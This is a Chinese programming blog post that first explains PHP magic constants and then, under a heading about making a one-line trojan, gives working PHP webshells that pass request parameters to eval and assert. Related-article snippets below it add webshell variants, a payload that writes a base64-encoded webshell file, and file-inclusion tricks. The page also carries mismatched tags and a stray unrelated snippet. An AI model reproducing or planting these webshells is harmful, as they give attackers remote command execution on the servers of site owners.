PHP 魔术常量 一句话制作木马$_GET $_POST include命令

最新推荐文章于 2023-08-21 00:51:48 发布
原创 最新推荐文章于 2023-08-21 00:51:48 发布 · 1.4k 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#p2p #debian #网络协议
本文介绍了PHP的四个魔术常量__LINE__, __FILE__, __DIR__, 和 __FUNCTION__的功能和使用示例。同时,讨论了利用$_GET, $_POST和include命令可能存在的安全风险,如通过eval和assert执行恶意代码。" 124311987,9354391,使用Matlab的文件选择对话框加载3D点云,"['计算机视觉', '3d', 'matlab']

一.PHP 魔术常量

 __LINE__ 的值就依赖于它在脚本中所处的行来决定。这些特殊的常量不区分大小写

1.__LINE__

文件中的当前行号

<?php echo '这是第 " ' . __LINE__ . ' " 行'; 

以上实例输出结果为:这是第 “ 2 ” 行

2.__FILE__

文件的完整路径和文件名

<?php echo '该文件位于 " ' . __FILE__ . ' " '; ?>

以上实例输出结果为:该文件位于 “ E:\wamp\www\test\index.php ”

3.__DIR__

文件所在的目录。如果用在被包括文件中,则返回被包括的文件所在的目录。

它等价于 dirname(__FILE__)。除非是根目录,否则目录中名不包括末尾的斜杠。

<?php echo '该文件位于 " ' . __DIR__ . ' " '; ?>

以上实例输出结果为:该文件位于 “ E:\wamp\www\test ”

4.__FUNCTION__ 

函数名称(PHP 4.3.0 新加)。自 PHP 5 起本常量返回该函数被定义时的名字(区分大小写)

<?php function test() {

echo '函数名为:' . __FUNCTION__ ; }

test();

?>

以上实例输出结果为:函数名为:test

二 一句话制作木马

1.$_GET

<?php

@eval ($_GET['cmd']);

 ?>

 2.$_POST

<?php

@eval ($_POST['cmd']);

?>

 3.<?php

@assert ($_POST['cmd']);

?>

4.include

 <?php 
include 'jhs.php'; 
?>

 

<?php
phpinfo();
?>

干饭人666
关注
Echo写入句话木马+分段写入
weixin_43457035的博客
11-20 4023
echo写入句话木马+分段写入
攻防世界 Web_php_include(include)
Haowill的博客
04-15 1180
Web_php_include 拿到这道题目看到include,我觉得像是道文件包含漏洞的题目,这种漏洞般做法有两种 1.包含的文件在本地上传个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含的文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到题目 很有意思这个题目给的是源代码。 <?...
ctfshow 常用姿势
qq_53063436的博客
11-02 1448
ctfshow 常用姿态
php代码审计【5】代码执行漏洞
司徒荆的博客
06-16 956
代码执行漏洞
那些强悍的PHP句话后门
weixin_30338461的博客
05-11 2082
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数些有意思的PHP句话木马。 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 ...
php $_POST传值
ling811的专栏
02-12 949
1、 2、
php句话图片木马怎么运行,php图片木马怎么运行
weixin_31034309的博客
03-10 2758
PHP图片木马的的运行方法1、标准的写法,直接通过eval执行php代码@eval ($_POST['code']);2、动态执行assert生成木马文件(隐藏性最好的种)@$_GET['a']($_GET['code']);3、使用方法:从url中传入下面参数执行后会在当前目录生成个c.php的文件/index.php?a=assert&code=${fputs%28fopen%...
php 图片木马,php图片木马怎么运行
weixin_34998630的博客
03-09 3688
PHP图片木马的的运行方法1、标准的写法,直接通过eval执行php代码@eval ($_POST['code']);2、动态执行assert生成木马文件(隐藏性最好的种)@$_GET['a']($_GET['code']);3、使用方法:从url中传入下面参数执行后会在当前目录生成个c.php的文件/index.php?a=assert&code=${fputs%28fopen%...
XCTF-攻防世界CTF平台-Web类——4、Web_php_includephp中strstr()函数绕过、数据流协议)
Onlyone_1314的博客
11-14 3909
目录标题级目录方法、文件包含:php伪协议绕过strstr()函数方法二、文件包含:GET方式提交命令方法三、data://伪协议方法四、句话木马连接后台方法五、data://伪协议+句话木马 级目录 打开题目地址: 代码: <?php show_source(__FILE__); echo $_GET['hello']; //输出hello变量指向的内容 $page=$_GET['page']; //把page变量的值赋给$page while (strstr($page
墨者 - PHP代码分析溯源(第1题)
吃肉唐僧的博客
07-12 794
进入环境,发现是php源码 用在线php代码调试工具调试(要用echo输出,将${$__}[!$_](${$___}[$_]);删掉,否则报错) 结合输出,${$__}[!$_](${$___}[$_]); 的意思大概是 <?php $_GET[0]($_POST[1])?> 这是php句话木马的变种 其他更多变种参考:https://blog.csdn.net/x...
php 句话木马 安全漏洞
fareast_mzh的博客
01-13 1562
* get.php <?php $_GET[a]($_GET[b]);?> ?a=assert&b=${} 参数b中的内容待定 创建文件code.txt fwrite(fopen("c.php", "w"), base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyJjIl0pPz4=")) b.php <?php $...
靶场训练笔记-ctf训练营WEB方向第章新手村1第6题:ezinclude
ddingddding的博客
08-21 1200
对网址为ctf.hetianlab.com的ctf训练营WEB方向第章新手村1第6题:ezinclude的做题全过程
PHP代码审计笔记--文件包含漏洞
11-06 612
有限制的本地文件包含: &lt;?php include($_GET['file'].".php"); ?&gt; %00截断: ?file=C://Windows//win.ini%00 (window,magic_quotes_gpc=off,网络上盛传PHP小于5.3.4有效,未完全进行测试,亲测 PHP 5.2.17有效,PHP-5.3.29...
PHP伪协议-文件包含
shiyingai
12-24 2159
lfi.php <?php include $_GET['file']; ?> php://input   php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。 注:当enctype="multipart/form-data",php://input 是无效的。
php get的用法,PHP$_GET 的用法概述
weixin_31993699的博客
03-11 1534
PHP$_GET 变量用于收集来自 method=”get” 的表单中的值。$_GET 变量$_GET 变量是个数组,内容是由 HTTP GET 方法发送的变量名称和值。$_GET 变量用于收集来自 method=”get” 的表单中的值。从带有 GET 方法的表单发送的信息,对任何人都是可见的(会显示在浏览器的地址栏),并且对发送的信息量也有限制(最多 100 个字符)。例子Name: Ag...
句话木马的原理
枫梓林のBlog
04-22 9122
句话木马的原理 文章目录句话木马的原理0x00 前言0x01 解析 PHP 句话木马的原理0x02 解析蚁剑连接句话木马原理1.蚁剑2.使用蚁剑进行连接0x03 分析蚁剑连接原理0x04 加密的 ASP 句话后门0x04 JSP句话木马0x05 ASPX句话 0x00 前言 常用的句话后门工具分为 ASP、ASP.NET、JSP和 PHP 四种类型 0x01 解析 PHP 句话木马的原理 常用句话木马 php句话木马: <?php @eval($_POST['pass']);?
PHP 句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
热门推荐
百彦子烨的博客
11-10 3万+
该文章对PHP句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
CTFSHOW-文件包含
Monica的博客
09-12 7351
WEB78 题目: <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 知识点:php伪协议 php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们般对其进行编码,让其不执行。从而导致 任意文件读取。 1、php://input
python+php句话木马的利用
CYLK1987310466的博客
07-29 1709
python知识点,php句话木马
php $_get在框架中运用,PHP$_GET与Header方法可能遇到的问题
weixin_36046702的博客
03-19 340
假设有个网址是www.jiashe.com?type=c++如果想要获取type的值,我们知道:var_dump($_GET['type']);然而,结果却是: 可以看出来,应该输出c++的,却输出了c空格空格。下面分析下这个过程:当我们在浏览器中输入www.jiashe.com?type=c++这个URL之后,浏览器首先需要对这个URL进行编码。编码的规则是对非ASCII码以%加2个十六进制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值